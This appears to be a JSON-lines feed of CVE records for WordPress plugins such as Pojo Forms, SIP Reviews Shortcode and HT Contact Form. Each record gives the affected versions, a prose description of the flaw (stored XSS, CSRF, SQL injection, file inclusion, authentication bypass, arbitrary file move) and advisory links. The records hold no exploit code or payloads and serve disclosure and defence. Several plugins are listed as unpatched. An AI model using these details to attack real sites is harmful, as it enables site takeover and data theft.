{"CVE_ID":"CVE-2024-12722","slug":"twitter-bootstrap-collapse-aka-accordian-shortcode","versionImpact":"1.0","description":"The Twitter Bootstrap Collapse aka Accordian Shortcode WordPress plugin through 1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3be5990-ca89-4ac4-baae-49af55df9d57\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3be5990-ca89-4ac4-baae-49af55df9d57\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4369","slug":"companion-auto-update","versionImpact":"3.9.2","description":"The Companion Auto Update plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018update_delay_days\u2019 parameter in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-auto-update\\\/tags\\\/3.9.2\\\/admin\\\/dashboard.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/companion-auto-update\\\/tags\\\/3.9.2\\\/admin\\\/dashboard.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325878\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325878\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/companion-auto-update\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/companion-auto-update\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c61072-5480-43f3-ad9f-ed3f0d577ebc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4c61072-5480-43f3-ad9f-ed3f0d577ebc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4352","slug":"wp-jobsearch ","versionImpact":"1.8.1","description":"The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the save_locsettings function in versions up to, and including, 1.8.1. This makes it possible for unauthenticated attackers to change the settings of the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59170f0a-975e-487c-bdb0-585c802b3127?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59170f0a-975e-487c-bdb0-585c802b3127?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed7e664e-5a73-4d2d-a599-a0be89d6c2d1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ed7e664e-5a73-4d2d-a599-a0be89d6c2d1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-jobsearch-wp-job-board-plugin-fixed-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3941","slug":"recaptcha-jetpack","versionImpact":"0.2.2","description":"The reCAPTCHA Jetpack WordPress plugin through 0.2.2 does not have a CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make a logged-in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e09e922-983c-4406-8053-747d839995d1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e09e922-983c-4406-8053-747d839995d1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3726","slug":"login-logout-register-menu","versionImpact":"2.0","description":"The Login Logout Register Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'llrmloginlogout' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8a93aab-4845-46ed-8adc-d06b2ee8ee9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8a93aab-4845-46ed-8adc-d06b2ee8ee9e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-register-menu\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/login-logout-register-menu\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6549","slug":"admin-post-navigation","versionImpact":"2.1","description":"The Admin Post Navigation plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d27ef0b4-266f-47b8-a7aa-ddff5adaac7a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d27ef0b4-266f-47b8-a7aa-ddff5adaac7a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-post-navigation\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-post-navigation\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6590","slug":"wpgsi","versionImpact":"3.7.9","description":"The Spreadsheet Integration \u2013 Automate Google Sheets With WordPress, WooCommerce & Most Popular Form Plugins. Also, Display Google sheet as a Table. plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 3.7.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit post status, edit Google sheet integrations, and create Google sheet integrations.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ff2cc-9af2-4b72-bc49-e205275daa4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35ff2cc-9af2-4b72-bc49-e205275daa4d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L812\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L812\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L863\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L863\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L935\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L935\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L1168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-admin.php#L1168\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6480","slug":"sip-reviews-shortcode-woocommerce","versionImpact":"1.2.3","description":"The SIP Reviews Shortcode for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'no_of_reviews' attribute in the woocommerce_reviews shortcode in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43aa28ec-6553-4527-a1d1-eb4a58533c5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43aa28ec-6553-4527-a1d1-eb4a58533c5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L424\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L424\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10909","slug":"pojo-forms","versionImpact":"1.4.7","description":"The Pojo Forms plugin for WordPress is vulnerable to arbitrary shortcode execution via the form_preview_shortcode AJAX action in all versions up to, and including, 1.4.7. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. This was partially fixed in version 1.4.8.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pojo-forms\\\/tags\\\/1.4.7\\\/classes\\\/class-pojo-forms-ajax.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pojo-forms\\\/tags\\\/1.4.7\\\/classes\\\/class-pojo-forms-ajax.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201936\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201936\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pojo-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pojo-forms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9697","slug":"social-rocket","versionImpact":"1.3.4","description":"The Social Rocket \u2013 Social Sharing Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tweet_settings_save() and tweet_settings_update() functions in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5501\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5501\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-rocket\\\/trunk\\\/admin\\\/includes\\\/class-social-rocket-admin.php#L5531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/168dd2d4-bffb-4187-afc7-02fef8cb51a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/168dd2d4-bffb-4187-afc7-02fef8cb51a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-28894","slug":"list-posts-by-category","versionImpact":"2.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in frucomerci List of Posts from each Category plugin for WordPress allows Stored XSS. This issue affects List of Posts from each Category plugin for WordPress: from n\/a through 2.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/list-posts-by-category\\\/vulnerability\\\/wordpress-list-of-posts-from-each-category-plugin-for-wordpress-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/list-posts-by-category\\\/vulnerability\\\/wordpress-list-of-posts-from-each-category-plugin-for-wordpress-plugin-2-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4394","slug":"locations","versionImpact":"3.2.1","description":"The Locations plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.1. This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to update custom field meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3df9f237-a861-43fc-8623-d42f84d8d5d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3df9f237-a861-43fc-8623-d42f84d8d5d1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548546%40locations&new=2548546%40locations&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2548546%40locations&new=2548546%40locations&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4488","slug":"dropbox-folder-share","versionImpact":"1.9.7","description":"The Dropbox Folder Share for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.9.7 via the editor-view.php file. This allows unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647a2f27-092a-4db1-932d-87ae8c2efcca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/647a2f27-092a-4db1-932d-87ae8c2efcca?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/UsosGenerales\\\/js\\\/editor-view.php?rev=2904670\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dropbox-folder-share\\\/trunk\\\/HynoTech\\\/UsosGenerales\\\/js\\\/editor-view.php?rev=2904670\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4922","slug":"wpb-show-core","versionImpact":"2.2","description":"The WPB Show Core WordPress plugin through 2.2 is vulnerable to a local file inclusion via the `path` parameter.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/968d87c0-af60-45ea-b34e-8551313cc8df\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/968d87c0-af60-45ea-b34e-8551313cc8df\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4393","slug":"social-connect","versionImpact":"1.2","description":"The Social Connect plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2. This is due to insufficient verification on the OpenID server being supplied during the social login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2882d9dd-0c73-4c9a-99cb-d10900503103?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2882d9dd-0c73-4c9a-99cb-d10900503103?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-connect\\\/tags\\\/1.2\\\/openid\\\/openid.php#L575\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-connect\\\/tags\\\/1.2\\\/openid\\\/openid.php#L575\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3940","slug":"recaptcha-jetpack","versionImpact":"0.2.2","description":"The reCAPTCHA Jetpack WordPress plugin through 0.2.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb0245e5-8e94-4f11-9003-d6208945056c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bb0245e5-8e94-4f11-9003-d6208945056c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6548","slug":"add-admin-javascript","versionImpact":"2.0","description":"The Add Admin JavaScript plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1069c845-30b9-4aca-8a60-8b66c48365af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1069c845-30b9-4aca-8a60-8b66c48365af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-javascript\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-admin-javascript\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8919","slug":"confetti-fall-animation","versionImpact":"1.3.0","description":"The Confetti Fall Animation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'confetti-fall-animation' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80fc93-212e-481d-907c-275139782e77?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b80fc93-212e-481d-907c-275139782e77?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/confetti-fall-animation\\\/trunk\\\/confetti-fall-animation.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/confetti-fall-animation\\\/trunk\\\/confetti-fall-animation.php#L242\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6479","slug":"sip-reviews-shortcode-woocommerce","versionImpact":"1.2.3","description":"The SIP Reviews Shortcode for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'no_of_reviews' attribute in the woocommerce_reviews shortcode in all versions up to, and including, 1.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a920a77a-681a-4309-bce2-1f77c11c8b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a920a77a-681a-4309-bce2-1f77c11c8b29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sip-reviews-shortcode-woocommerce\\\/trunk\\\/public\\\/partials\\\/plugin-reviews-shortcode-display.php#L331\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7360","slug":"ht-contactform","versionImpact":"2.2.1","description":"The HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. plugin for WordPress is vulnerable to arbitrary file moving due to insufficient file path validation in the handle_files_upload() function in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to move arbitrary files on the server, which can easily lead to remote code execution when the right file is moved (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Api\\\/Endpoints\\\/Submission.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FApi%2FEndpoints%2FSubmission.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3326887\\\/ht-contactform\\\/trunk\\\/admin\\\/Includes\\\/Api\\\/Endpoints\\\/Submission.php?contextall=1&old=3316109&old_path=%2Fht-contactform%2Ftrunk%2Fadmin%2FIncludes%2FApi%2FEndpoints%2FSubmission.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-contactform\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ht-contactform\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd42c83c-c51c-45a5-8ad5-0df2c0cc411d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd42c83c-c51c-45a5-8ad5-0df2c0cc411d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
